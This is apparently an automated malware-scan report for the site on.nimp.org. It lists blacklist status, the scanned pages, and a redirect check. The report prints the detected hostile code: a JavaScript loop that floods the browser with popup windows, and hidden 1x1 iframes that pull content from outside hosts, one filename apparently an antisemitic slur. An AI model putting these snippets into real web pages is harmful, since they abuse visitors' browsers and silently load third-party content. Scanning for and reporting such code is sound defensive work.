Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=on.nimp.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.on.nimp.org/ | 200 OK Content-Length: 31507 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://www.on.nimp.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://static.nimp.org/lm.pdf <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> Hidden iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> | ||
http://www.on.nimp.org/test404page.js | 200 OK Content-Length: 31507 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://www.on.nimp.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> Hidden iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> Hidden iFrame found. size: 1x1 src: http://static.nimp.org/lm.pdf <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: on.nimp.org
Result:
GET / HTTP/1.1
Host: on.nimp.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: on.nimp.org
Referer: http://www.google.com/search?q=on.nimp.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: on.nimp.org
Referer: http://www.google.com/search?q=on.nimp.org
Result:
The result is similar to the first query. There are no suspicious redirects found.